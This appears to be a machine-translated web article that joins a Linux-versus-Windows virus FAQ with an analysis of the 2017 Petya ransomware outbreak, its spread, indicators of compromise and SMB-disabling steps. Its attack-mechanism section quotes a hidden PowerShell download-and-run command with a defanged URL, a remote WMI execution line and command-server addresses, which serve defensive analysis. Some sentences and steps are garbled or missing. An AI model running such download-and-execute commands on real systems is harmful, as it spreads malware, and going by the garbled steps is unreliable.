That's nonsense.

This case just seems to hint, guys, besides Windows there is also Linux, which, by the way, is free and on which such things are practically impossible.
By the way, I would have switched to tench long ago, but development is holding up. I don't know how to drag projects there and find a suitable development environment.

Here is a quote taken from the site

It is believed that Unix systems are much better protected from computer viruses than Windows operating systems. Basically, still there is no widespread virus for Linux, while in the environment Windows is simply teeming with all sorts of infections . This is largely due to the access rights system of *nix platforms, as well as the lack (in many distributions) of pre-installed network services that accept incoming connections, and the fact that vulnerabilities are fixed very quickly in Linux. But despite all the above arguments, viruses can still settle in insufficiently protected *nix systems and carry out their sneaky work.

And now I will give answers to the most common questions about viruses in Linux.
1. Does it exist in nature? viruses for Linux?
Of course there are, but their number is negligible compared to operating system Windows.

2. Can Windows viruses infect Linux OS?
Of course they can, but only if Wine is installed, which is a kind of environment for running Win applications. In my practice, there was a case when the viruses in the .wine folder grew so large that their number was more than 17,000, and the total size was just over 1Gb. But these viruses do no harm to Linux systems. After all, they can only operate in a win-environment. If in Windows you need to install, for example, scan the system, and it’s not a fact that everything will work after that, then in Ubuntu I simply deleted the.wine package, and then installed the necessary win-programs again. My Ubuntu has not been affected in any way by a large number of Windows viruses.

3. Is it true that Linux is more secure than Windows?
Yes, this is the absolute truth. Let me give you an example. There is an opinion that there are few viruses on Linux because its share in the operating system market is extremely small, which is why viruses are created for Windows because of its great popularity and prevalence. If Linux had been more popular, a bunch of viruses would have been written for it as well. But that's not true. If we take the most popular software for web servers, it would be Apache. As of 2013, Apache's share of web servers is almost 45%, and Microsoft's IIS has a 23.10% market share. It follows from this that hacker attacks should be more active more Internet resources on Apache, and we should see more worms, viruses and other malware targeting Apache and the operating systems it runs on than Windows and IIS. But in life things are different. For a long time now, Microsoft's IIS has been a target for network worms and all kinds of attacks.

The main advantages of Linux in terms of security:

• Very few viruses have been created for *nix platforms;
• exists a large number of different Linux distributions. Some work with .deb packages, others with .RPM packages. Creating a virus that will work equally well in all of them is very difficult;
• Different distributions have different sets installed by default, compiled differently software, which also reduces the likelihood of mass infection by the virus;
• Programs that are downloaded from the Internet are not executable in Linux by default. First they must be made so;
• The main source of software in Linux is verified (official) repositories. This gives us the right to assert that the likelihood of viruses entering these sources is extremely low.

There is a new ransomware virus epidemic on the Internet. The malware practically blocked the work of dozens of large companies, demanding decryption hard drive each workstation is just under $400.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a complex of newly assembled encryption viruses “Petya” and “Misha”. At this point, it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry - an exploit for the MS17-010 vulnerability is used, which was enhanced by social engineering using a vulnerability in MS Word. Infection occurs after a user opens an email attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. And distribution to other computers on the network is already ensured by a whole set of techniques:

• stealing user passwords or using active sessions to access other network nodes (Mimikatz utility code is used).
• through a vulnerability in SMB (CVE-2017-0144, MS17-010) - using the same famous EthernalBlue exploit that was successfully used in WannaCry.

The malware uses stolen Accounts, to copy his body into the admin$ balls and launches them using the legal PsExec utility, which is used to remotely control a computer.

Developer of a famous program Mimikatz, confirmed that its modified code is used to extract passwords.

Code for using the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. The virus, penetrating the computer, infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the entire HDD users, and not just individual files, as ransomware viruses usually do.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs it?

Since the recovery mechanism was not included in the code, there are three possible options for motivating attackers. Either they wanted to disguise the targeted destruction of someone’s specific data as a mass epidemic, or they wanted to make money without initially intending to restore anything. The least likely option is cyber vandalism. A virus is a serious product, and it would be wiser to spend the effort to create it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiaries of the epidemics of the last 2 months were, apparently, the group The Shadow Brokers, which distributed the EthernalBlue exploit. The extortionists themselves collected relatively small amounts of money, several orders of magnitude less than the amount of damage caused by the epidemic. Epidemics have become great advertising The Shadow Brokers, who claim that they are ready to sell information about the remaining exploits from the NSA archive. After all, EthernalBlue is just one exploit out of dozens stolen from the Secret Service in August 2016.

Attack Mechanism

An attacker can send files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), through which a workstation running Windows is infected. For example, when opening the file Order-[any date].doc, the server 84.200.16.242 is contacted on port 80 and xls is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After attaching to the host, it scans other Windows machines on the network and spreads using the vulnerabilities described in MS17-010 (the same ones that WannaCry used) on ports tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Distribution can also occur by executing the command:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"

The infection spread diagram is taken from blog.kryptoslogic.com

How to avoid infection?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, you can create a file c:\windows\perfc without an extension. Such nodes are not infected.

They are trying to infect using a well-known vulnerability in the SMB protocol (MS17-10).

As a preventive measure, you can disable SMB (Server Message Block) protocols on the local .

How to disable SMB protocol version 1 on local:

– run

- in the window that opens after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend=bowser/mrxsmb20/nsi

– press the key Enter;

– a message will appear ;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb10 start= disabled

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

- close the window .

How to disable SMB protocols version 2 and 3 on local:

– run on behalf of the system administrator;

- in the window that opens Administrator: Command line after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend=bowser/mrxsmb10/nsi

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb20 start= disabled

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

- close the window .

How to enable SMB version 1 protocol on local:

– run on behalf of the system administrator;

- in the window that opens Administrator: Command Line after the system prompt (C:\Windows\System32>) enter the command

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb10 start=auto

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

- close the window .

How to enable SMB version 2 and 3 protocols on local:

– run on behalf of the system administrator;

– in the Administrator: Command Prompt window that opens after the system prompt (C:\Windows\System32>), enter the command

sc.exe config lanmanworkstation depend=bowser/mrxsmb10/mrxsmb20/nsi

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb20 start=auto

– press the key Enter;

– a message will appear ChangeServiceConfig: success;

- close the window .

Notes

1. After making these changes (enabling or disabling SMB protocols), you must reboot.

2. Enabling or disabling SMB version 2 in Windows also enables or disables SMB version 3. This is due to the use of a common stack for these protocols.

3. Disabling SMB version 2 will disable some Windows functionality.

4. Giant does not recommend disabling SMB protocol version 2 or 3. Disabling SMB protocol version 2 or 3 should only be used as a temporary troubleshooting measure. Do not leave SMB version 2 or 3 in use for long periods of time.

Over the past few weeks, the digital world has experienced several serious virus attacks. In mid-May, mass infection of computers with the WannaCry virus began. This malware is designed to extort Money. The malware encrypts all user data on a computer controlled by the operating system, after which the owner of the infected PC is offered to pay a ransom of around $300 (in Bitcoin cryptocurrency) to receive a decryption key. More recently, another no less dangerous virus appeared - Petya.A. He uses digital signature Microsoft and disguises itself as a licensed Windows application.

Like WannaCry, it exploits a system vulnerability called EternalBlue (CVE-2017-0144) through the management of WMI and PsExec system tools. It does not have a remote activator, like its May predecessor, it is much more cunning, and has extensive automatic distribution capabilities.

How do you know if your computer is infected with Petya.A?

The personal computer automatically reboots, after which it displays a screen with a fake verification procedure hard drives system utility CHKDSK. And while the user is supposedly waiting for the scan to complete, all data on the disks begins to be encrypted by the virus. After the encryption process is completed, a message with a ransom demand appears on the screen.

How to protect yourself from the Petya.A virus?

The first rule, which is relevant for all users and at all times: do not open emails from unknown senders. This is especially true for letters that have some files attached. To prevent the spread of the virus, the user must disable the SMB v1/v2/v3 protocol in advance. How to do this can be found in the official instructions on. It is necessary to close TCP ports 1024 to 1035, as well as 135 and 445.

• C:\Windows\perfc.dat


• C:\myguy.xls.hta


• %APPDATA%\10807.exe

Network security specialists noticed an interesting feature. If you create a perfc file (without extension) in the folder with the operating system, this will prevent the virus from running on personal computer. If the computer reboots spontaneously and the disk scan begins, you must immediately turn it off and disconnect the PC from the network to avoid infecting other machines. If possible, you should make a copy of your data and try to restore the bootloader using the bootrec system utility, booting from a disk or system flash drive.